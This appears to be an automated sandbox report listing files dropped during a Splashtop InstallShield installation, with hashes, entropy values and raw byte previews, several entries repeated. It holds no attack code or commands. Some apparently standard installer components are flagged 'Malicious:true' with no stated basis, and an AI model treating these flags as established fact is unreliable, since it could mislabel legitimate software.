                                                                                                                                                                                                                                                                                                                                  Preview:[SetupDefaults]..LangID=1033..ProductCode={B7C5EA94-B96A-41F5-BE95-25D78B486678}..TempPathGuid={C9EB51E3-2723-43F9-ADE8-79DDD04C17A9}..[f9]..Function=CA_ConflictCheck..[f6]..Function=CA_Finished..[f14]..Function=CA_Init..[f5]..Function=CA_InstDone..[f1]..Function=CA_InstSSU..[f3]..Function=CA_InstSrvAndDrv..[f10]..Function=CA_PostCleanup..[f13]..Function=CA_PreCleanup..[f7]..Function=CA_PreStopProcess..[f11]..Function=CA_StopProcess..[f8]..Function=CA_UIIsMaintenance..[f4]..Function=CA_UninstSSU..[f2]..Function=CA_UninstSrvAndDrv..[f12]..Function=CA_UpdateSetting..

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{3302634C-E4F1-4E20-978A-65EAB068911F}\String1033.txt

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (332), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):186494
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6614874204671106
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:gSeMLR6/K41+BrChTHB8Xd12hWA/z+wuUZU6rPsHnQvvOuyMJice1VOL27p6:gmLu1xTh84W9CoeT
                                                                                                                                                                                                                                                                                                                                  MD5:1D4329601BEF6492CD3227DF5BCD5125
                                                                                                                                                                                                                                                                                                                                  SHA1:D03A3C50BA7663B52C13B54B08B9284F40E4F848
                                                                                                                                                                                                                                                                                                                                  SHA-256:BD703470B2F35E3C4D917D3038BF806FCC7C155142D300806C95500274951EFD
                                                                                                                                                                                                                                                                                                                                  SHA-512:B0CFC1AEF000D428D1FF4F2DF41539284A048571E26A2C1A217093E593E546F5AF79BBC61BE8458021A9829A7D79F68CB8728BF942475096B53C81A66094DD7B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..C.O.M.P.A.N.Y._.N.A.M.E.=.S.p.l.a.s.h.t.o.p. .I.n.c.......D.N._.A.l.w.a.y.s.I.n.s.t.a.l.l.=.A.l.w.a.y.s. .I.n.s.t.a.l.l.....I.D.D.R.O.P._.S.R.S._.C.O.N.F.L.I.C.T.E.D.=.T.h.e. .[.P.r.o.d.u.c.t.N.a.m.e.]. .i.n.s.t.a.l.l.a.t.i.o.n. .o.n. .t.h.i.s. .c.o.m.p.u.t.e.r. .w.a.s. .f.a.i.l.e.d... .M.a.k.e. .s.u.r.e. .y.o.u.'.v.e. .u.n.i.n.s.t.a.l.l.e.d. .a.n.y. .p.r.e.v.i.o.u.s.l.y. .i.n.s.t.a.l.l.e.d. .s.o.f.t.w.a.r.e. .b.e.f.o.r.e. .i.n.s.t.a.l.l.i.n.g. .[.P.r.o.d.u.c.t.N.a.m.e.].......I.D.P.R.O.P._.E.X.P.R.E.S.S._.L.A.U.N.C.H._.C.O.N.D.I.T.I.O.N._.A.C.R.O.B.A.T.5.F.O.L.D.E.R.=. . . .A.d.o.b.e. .A.c.r.o.b.a.t. .5. .n.e.e.d.s. .t.o. .b.e. .i.n.s.t.a.l.l.e.d. .f.o.r. .t.h.i.s. .i.n.s.t.a.l.l.a.t.i.o.n. .t.o. .c.o.n.t.i.n.u.e.......I.D.P.R.O.P._.E.X.P.R.E.S.S._.L.A.U.N.C.H._.C.O.N.D.I.T.I.O.N._.A.D.O.B.E.R.E.A.D.E.R.1.0.F.O.L.D.E.R.=.A.d.o.b.e. .R.e.a.d.e.r. .1.0. .n.e.e.d.s. .t.o. .b.e. .i.n.s.t.a.l.l.e.d. .f.o.r. .t.h.i.s. .i.n.s.t.a.l.l.a.t.i.o.n. .t.o. .c.o.n.t.i.n.u.e.......I.D.P.R.O.P._.E.

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{3302634C-E4F1-4E20-978A-65EAB068911F}\_is182.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):183856
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.777994123339856
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:MIFNKUw8ALJ+C2T0FSmmiYQT4nF2E+JYjdeZ2bgA/qVzs:AUn0mT8Sc/T4F1bpxg8z
                                                                                                                                                                                                                                                                                                                                  MD5:7A1C100DF8065815DC34C05ABC0C13DE
                                                                                                                                                                                                                                                                                                                                  SHA1:3C23414AE545D2087E5462A8994D2B87D3E6D9E2
                                                                                                                                                                                                                                                                                                                                  SHA-256:E46C768950AAD809D04C91FB4234CB4B2E7D0B195F318719A71E967609E3BBED
                                                                                                                                                                                                                                                                                                                                  SHA-512:BBEC114913BC2F92E8DE7A4DD9513BFF31F6B0EF4872171B9B6B63FEF7FAA363CF47E63E2D710DD32E9FC84C61F828E0FAE3D48D06B76DA023241BEE9D4A6327
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.*.!.D.!.D.!.D../..D.D../..(.D../....D.... .D.!.E.[.D......D.....%.D..... .D.!.. .D..... .D.Rich!.D.........................PE..d...d.a.........."......X...v.................@....................................s{....`..................................................J..........`.......$.......0$..........`t..8...............................p............p...............................text....W.......X.................. ..`.rdata.......p.......\..............@..@.data... B...`.......D..............@....pdata..$............`..............@..@.rsrc...`............v..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{3302634C-E4F1-4E20-978A-65EAB068911F}\_isres_0x0409.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1864872
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.69189927762803
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:ds4d9dfaOdWJIApJCPtjvntnSb8COevQonCLPub+7NPS:dhrWiADCPtjvntnSb8COevQonCftS
                                                                                                                                                                                                                                                                                                                                  MD5:BEFE2EF369D12F83C72C5F2F7069DD87
                                                                                                                                                                                                                                                                                                                                  SHA1:B89C7F6DA1241ED98015DC347E70322832BCBE50
                                                                                                                                                                                                                                                                                                                                  SHA-256:9652FFAE3F5C57D1095C6317AB6D75A9C835BB296E7C8B353A4D55D55C49A131
                                                                                                                                                                                                                                                                                                                                  SHA-512:760631B05EF79C308570B12D0C91C1D2A527427D51E4E568630E410B022E4BA24C924D6D85BE6462BA7F71B2F0BA05587D3EC4B8F98FCDB8BB4F57949A41743B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^..(...{...{...{...{...{,..{J..{...{P..{..{...{,..{...{..{...{Rich...{........PE..L...4..a...........!.........................................................p......Q<.......................................@..(....P..9...........pP..8$...@.......................................................A...............................text...@........................... ..`.rdata........... ..................@..@.data....f.......P..................@....idata.......@....... ..............@....rsrc...9....P.......0..............@..@.reloc...)...@...0... ..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{3302634C-E4F1-4E20-978A-65EAB068911F}\setup.inx

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):353888
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.39949998550144
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:jfLdZMDVq3/HvkZe6hTYYmWyQ98js8sNWo2vBg3vu:jzsDVq3/HB6hzyIhUfvBF
                                                                                                                                                                                                                                                                                                                                  MD5:0376DD5B7E37985EA50E693DC212094C
                                                                                                                                                                                                                                                                                                                                  SHA1:02859394164C33924907B85AB0AADDC628C31BF1
                                                                                                                                                                                                                                                                                                                                  SHA-256:C9E6AF6FB0BDBEB532E297436A80EB92A2FF7675F9C777C109208EE227F73415
                                                                                                                                                                                                                                                                                                                                  SHA-512:69D79D44908F6305EEE5D8E6F815A0FEE0C6D913F4F40F0C2C9F2F2E50F24BF7859EBE12C85138D971E5DB95047F159F077AE687989B8588F76517CAB7D3E0D5
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:t.,....(... <$.M. .=..........l.............o.c...gWSl..SW..WS[//d.d l$.XX%.......................q.y}aD%mQ.Y]A..M1...!.)........................................}...m..q]}}aMm.U=].E-M.5.=.%.-.......................e.......G.....v.@....qeymee1m.......c.)!!.)g..?.....K.7.+.OH..... .D@..0....e..dXH......P..(..]UU-]......kS.kk.....C.WO7'.[.<X44....,..$.8... ...}..\......@.5km!U.gL.8..g....-....._..k#+G##.LP8.H.@......0...T.......Y..D.........1II.1.o.s..Cg..G.....O.Og.CL<L.P.......p.d$........Y..L......<.. ...III.1..k_.....o.oGO?.....H.,@.X.P. ......p..,...\......m..<.....]YMEE.M..w[..[..{os.....O.C_G.t$l.D8\..........,.......}..]..`.........)5M.5.o.W_...sO3.SGk....h$.`,...4.L.$.<..........@...d...e}}1e.D.....o...S)!!.)g.GsK?..0.....#.h$P(.\\...........x(..am.I...p....H.......=9.!S3.wgksK.......3[C ......(.......,...........q.ayyaa.YQQYYc9E%11%9._.......W{7;wSo.......`(h<......L.4..........ay.q...a}Qii]Q....5MM!5.wSl.-.....w'.+k3/..+d.....

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{67C8555A-C946-4EFE-94E2-31ABF84FC74E}\ISRT.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, PECompact2 compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):437800
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.973112188633512
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:lj90SzD7w142fX+Tz8uOoigpDgQ+o4io1AVmeF7+Vp6b4aFUQPy39/A1TM0nq52r:Ruo7/zz81oi6DgQ+poASaPzMUQM8MAoM
                                                                                                                                                                                                                                                                                                                                  MD5:85315AD538FA5AF8162F1CD2FCE1C99D
                                                                                                                                                                                                                                                                                                                                  SHA1:31C177C28A05FA3DE5E1F934B96B9D01A8969BBA
                                                                                                                                                                                                                                                                                                                                  SHA-256:70735B13F629F247D6AF2BE567F2DA8112039FBCED5FBB37961E53A2A3EC1EC7
                                                                                                                                                                                                                                                                                                                                  SHA-512:877EB3238517EEB87C2A5D42839167E6C58F9CA7228847DB3D20A19FB13B176A6280C37DECDA676FA99A6CCF7469569DDC0974ECCF4AD67514FDEDF9E9358556
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...........A.YA.YA.Yf.mYG.Y..nY].Y..XC.Y..mY@.Y..mY..Y..lY..Y...Y@.Y...YE.YA.Y..Y...YV.Y..lY..Y..iY@.Y..jY@.YA.4Y@.Y..oY@.YRichA.Y................PE..L.....a...........!.....|...@...............................................@......................................p...................h...............($...0.........8...................................................DU..@....................text............P......PEC2MO...... ....rsrc....@.......4...T.............. ....reloc.......0......................@...........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{67C8555A-C946-4EFE-94E2-31ABF84FC74E}\IsConfig.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Generic INItialization configuration [f9]
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):571
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1920034114741345
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:sWCV4ygUcB2bbaxRjWIRLLN+eQ1LLmZLL7vLLB103e4ItDAdtDP4XMXLKxBo3XLc:sWCVQUNW53p5tDutDQcLKxunLKxQto
                                                                                                                                                                                                                                                                                                                                  MD5:DE10BE3435FBCAB7EECCAA67E2431619
                                                                                                                                                                                                                                                                                                                                  SHA1:7AFDB3C4C042692EA3F19F2D2275BADA7CACFBFD
                                                                                                                                                                                                                                                                                                                                  SHA-256:D193EDA99410268676293D315164FF29CD263CA0251A0238592A23A9D78476B0
                                                                                                                                                                                                                                                                                                                                  SHA-512:BDA2F23885D4BB07C328622D7F637379F63F08B57EB54C4A665FB56D5F68E61D36FF4B4E3CC2B8B2B3D3C5F2E0D3DBB581770EEC4FDDF9A8C0F4B6555AD3C1AF
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[SetupDefaults]..LangID=1033..ProductCode={B7C5EA94-B96A-41F5-BE95-25D78B486678}..TempPathGuid={C9EB51E3-2723-43F9-ADE8-79DDD04C17A9}..[f9]..Function=CA_ConflictCheck..[f6]..Function=CA_Finished..[f14]..Function=CA_Init..[f5]..Function=CA_InstDone..[f1]..Function=CA_InstSSU..[f3]..Function=CA_InstSrvAndDrv..[f10]..Function=CA_PostCleanup..[f13]..Function=CA_PreCleanup..[f7]..Function=CA_PreStopProcess..[f11]..Function=CA_StopProcess..[f8]..Function=CA_UIIsMaintenance..[f4]..Function=CA_UninstSSU..[f2]..Function=CA_UninstSrvAndDrv..[f12]..Function=CA_UpdateSetting..

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{67C8555A-C946-4EFE-94E2-31ABF84FC74E}\String1033.txt

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (332), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):186494
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6614874204671106
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:gSeMLR6/K41+BrChTHB8Xd12hWA/z+wuUZU6rPsHnQvvOuyMJice1VOL27p6:gmLu1xTh84W9CoeT
                                                                                                                                                                                                                                                                                                                                  MD5:1D4329601BEF6492CD3227DF5BCD5125
                                                                                                                                                                                                                                                                                                                                  SHA1:D03A3C50BA7663B52C13B54B08B9284F40E4F848
                                                                                                                                                                                                                                                                                                                                  SHA-256:BD703470B2F35E3C4D917D3038BF806FCC7C155142D300806C95500274951EFD
                                                                                                                                                                                                                                                                                                                                  SHA-512:B0CFC1AEF000D428D1FF4F2DF41539284A048571E26A2C1A217093E593E546F5AF79BBC61BE8458021A9829A7D79F68CB8728BF942475096B53C81A66094DD7B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..C.O.M.P.A.N.Y._.N.A.M.E.=.S.p.l.a.s.h.t.o.p. .I.n.c.......D.N._.A.l.w.a.y.s.I.n.s.t.a.l.l.=.A.l.w.a.y.s. .I.n.s.t.a.l.l.....I.D.D.R.O.P._.S.R.S._.C.O.N.F.L.I.C.T.E.D.=.T.h.e. .[.P.r.o.d.u.c.t.N.a.m.e.]. .i.n.s.t.a.l.l.a.t.i.o.n. .o.n. .t.h.i.s. .c.o.m.p.u.t.e.r. .w.a.s. .f.a.i.l.e.d... .M.a.k.e. .s.u.r.e. .y.o.u.'.v.e. .u.n.i.n.s.t.a.l.l.e.d. .a.n.y. .p.r.e.v.i.o.u.s.l.y. .i.n.s.t.a.l.l.e.d. .s.o.f.t.w.a.r.e. .b.e.f.o.r.e. .i.n.s.t.a.l.l.i.n.g. .[.P.r.o.d.u.c.t.N.a.m.e.].......I.D.P.R.O.P._.E.X.P.R.E.S.S._.L.A.U.N.C.H._.C.O.N.D.I.T.I.O.N._.A.C.R.O.B.A.T.5.F.O.L.D.E.R.=. . . .A.d.o.b.e. .A.c.r.o.b.a.t. .5. .n.e.e.d.s. .t.o. .b.e. .i.n.s.t.a.l.l.e.d. .f.o.r. .t.h.i.s. .i.n.s.t.a.l.l.a.t.i.o.n. .t.o. .c.o.n.t.i.n.u.e.......I.D.P.R.O.P._.E.X.P.R.E.S.S._.L.A.U.N.C.H._.C.O.N.D.I.T.I.O.N._.A.D.O.B.E.R.E.A.D.E.R.1.0.F.O.L.D.E.R.=.A.d.o.b.e. .R.e.a.d.e.r. .1.0. .n.e.e.d.s. .t.o. .b.e. .i.n.s.t.a.l.l.e.d. .f.o.r. .t.h.i.s. .i.n.s.t.a.l.l.a.t.i.o.n. .t.o. .c.o.n.t.i.n.u.e.......I.D.P.R.O.P._.E.

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{67C8555A-C946-4EFE-94E2-31ABF84FC74E}\_isFD6A.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):183856
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.777994123339856
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:MIFNKUw8ALJ+C2T0FSmmiYQT4nF2E+JYjdeZ2bgA/qVzs:AUn0mT8Sc/T4F1bpxg8z
                                                                                                                                                                                                                                                                                                                                  MD5:7A1C100DF8065815DC34C05ABC0C13DE
                                                                                                                                                                                                                                                                                                                                  SHA1:3C23414AE545D2087E5462A8994D2B87D3E6D9E2
                                                                                                                                                                                                                                                                                                                                  SHA-256:E46C768950AAD809D04C91FB4234CB4B2E7D0B195F318719A71E967609E3BBED
                                                                                                                                                                                                                                                                                                                                  SHA-512:BBEC114913BC2F92E8DE7A4DD9513BFF31F6B0EF4872171B9B6B63FEF7FAA363CF47E63E2D710DD32E9FC84C61F828E0FAE3D48D06B76DA023241BEE9D4A6327
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.*.!.D.!.D.!.D../..D.D../..(.D../....D.... .D.!.E.[.D......D.....%.D..... .D.!.. .D..... .D.Rich!.D.........................PE..d...d.a.........."......X...v.................@....................................s{....`..................................................J..........`.......$.......0$..........`t..8...............................p............p...............................text....W.......X.................. ..`.rdata.......p.......\..............@..@.data... B...`.......D..............@....pdata..$............`..............@..@.rsrc...`............v..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{67C8555A-C946-4EFE-94E2-31ABF84FC74E}\_isres_0x0409.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1864872
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.69189927762803
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:ds4d9dfaOdWJIApJCPtjvntnSb8COevQonCLPub+7NPS:dhrWiADCPtjvntnSb8COevQonCftS
                                                                                                                                                                                                                                                                                                                                  MD5:BEFE2EF369D12F83C72C5F2F7069DD87
                                                                                                                                                                                                                                                                                                                                  SHA1:B89C7F6DA1241ED98015DC347E70322832BCBE50
                                                                                                                                                                                                                                                                                                                                  SHA-256:9652FFAE3F5C57D1095C6317AB6D75A9C835BB296E7C8B353A4D55D55C49A131
                                                                                                                                                                                                                                                                                                                                  SHA-512:760631B05EF79C308570B12D0C91C1D2A527427D51E4E568630E410B022E4BA24C924D6D85BE6462BA7F71B2F0BA05587D3EC4B8F98FCDB8BB4F57949A41743B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^..(...{...{...{...{...{,..{J..{...{P..{..{...{,..{...{..{...{Rich...{........PE..L...4..a...........!.........................................................p......Q<.......................................@..(....P..9...........pP..8$...@.......................................................A...............................text...@........................... ..`.rdata........... ..................@..@.data....f.......P..................@....idata.......@....... ..............@....rsrc...9....P.......0..............@..@.reloc...)...@...0... ..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{67C8555A-C946-4EFE-94E2-31ABF84FC74E}\setup.inx

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):353888
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.39949998550144
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:jfLdZMDVq3/HvkZe6hTYYmWyQ98js8sNWo2vBg3vu:jzsDVq3/HB6hzyIhUfvBF
                                                                                                                                                                                                                                                                                                                                  MD5:0376DD5B7E37985EA50E693DC212094C
                                                                                                                                                                                                                                                                                                                                  SHA1:02859394164C33924907B85AB0AADDC628C31BF1
                                                                                                                                                                                                                                                                                                                                  SHA-256:C9E6AF6FB0BDBEB532E297436A80EB92A2FF7675F9C777C109208EE227F73415
                                                                                                                                                                                                                                                                                                                                  SHA-512:69D79D44908F6305EEE5D8E6F815A0FEE0C6D913F4F40F0C2C9F2F2E50F24BF7859EBE12C85138D971E5DB95047F159F077AE687989B8588F76517CAB7D3E0D5
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:t.,....(... <$.M. .=..........l.............o.c...gWSl..SW..WS[//d.d l$.XX%.......................q.y}aD%mQ.Y]A..M1...!.)........................................}...m..q]}}aMm.U=].E-M.5.=.%.-.......................e.......G.....v.@....qeymee1m.......c.)!!.)g..?.....K.7.+.OH..... .D@..0....e..dXH......P..(..]UU-]......kS.kk.....C.WO7'.[.<X44....,..$.8... ...}..\......@.5km!U.gL.8..g....-....._..k#+G##.LP8.H.@......0...T.......Y..D.........1II.1.o.s..Cg..G.....O.Og.CL<L.P.......p.d$........Y..L......<.. ...III.1..k_.....o.oGO?.....H.,@.X.P. ......p..,...\......m..<.....]YMEE.M..w[..[..{os.....O.C_G.t$l.D8\..........,.......}..]..`.........)5M.5.o.W_...sO3.SGk....h$.`,...4.L.$.<..........@...d...e}}1e.D.....o...S)!!.)g.GsK?..0.....#.h$P(.\\...........x(..am.I...p....H.......=9.!S3.wgksK.......3[C ......(.......,...........q.ayyaa.YQQYYc9E%11%9._.......W{7;wSo.......`(h<......L.4..........ay.q...a}Qii]Q....5MM!5.wSl.-.....w'.+k3/..+d.....

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{6F76B734-D534-49DB-8B2F-C42ABA90C4F4}\ISRT.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, PECompact2 compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):437800
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.973112188633512
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:lj90SzD7w142fX+Tz8uOoigpDgQ+o4io1AVmeF7+Vp6b4aFUQPy39/A1TM0nq52r:Ruo7/zz81oi6DgQ+poASaPzMUQM8MAoM
                                                                                                                                                                                                                                                                                                                                  MD5:85315AD538FA5AF8162F1CD2FCE1C99D
                                                                                                                                                                                                                                                                                                                                  SHA1:31C177C28A05FA3DE5E1F934B96B9D01A8969BBA
                                                                                                                                                                                                                                                                                                                                  SHA-256:70735B13F629F247D6AF2BE567F2DA8112039FBCED5FBB37961E53A2A3EC1EC7
                                                                                                                                                                                                                                                                                                                                  SHA-512:877EB3238517EEB87C2A5D42839167E6C58F9CA7228847DB3D20A19FB13B176A6280C37DECDA676FA99A6CCF7469569DDC0974ECCF4AD67514FDEDF9E9358556
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...........A.YA.YA.Yf.mYG.Y..nY].Y..XC.Y..mY@.Y..mY..Y..lY..Y...Y@.Y...YE.YA.Y..Y...YV.Y..lY..Y..iY@.Y..jY@.YA.4Y@.Y..oY@.YRichA.Y................PE..L.....a...........!.....|...@...............................................@......................................p...................h...............($...0.........8...................................................DU..@....................text............P......PEC2MO...... ....rsrc....@.......4...T.............. ....reloc.......0......................@...........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\{6F76B734-D534-49DB-8B2F-C42ABA90C4F4}\IsConfig.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Generic INItialization configuration [f9]
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):571
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1920034114741345
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:sWCV4ygUcB2bbaxRjWIRLLN+eQ1LLmZLL7vLLB103e4ItDAdtDP4XMXLKxBo3XLc:sWCVQUNW53p5tDutDQcLKxunLKxQto
                                                                                                                                                                                                                                                                                                                                  MD5:DE10BE3435FBCAB7EECCAA67E2431619
                                                                                                                                                                                                                                                                                                                                  SHA1:7AFDB3C4C042692EA3F19F2D2275BADA7CACFBFD
                                                                                                                                                                                                                                                                                                                                  SHA-256:D193EDA99410268676293D315164FF29CD263CA0251A0238592A23A9D78476B0
                                                                                                                                                                                                                                                                                                                                  SHA-512:BDA2F23885D4BB07C328622D7F637379F63F08B57EB54C4A665FB56D5F68E61D36FF4B4E3CC2B8B2B3D3C5F2E0D3DBB581770EEC4FDDF9A8C0F4B6555AD3C1AF
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
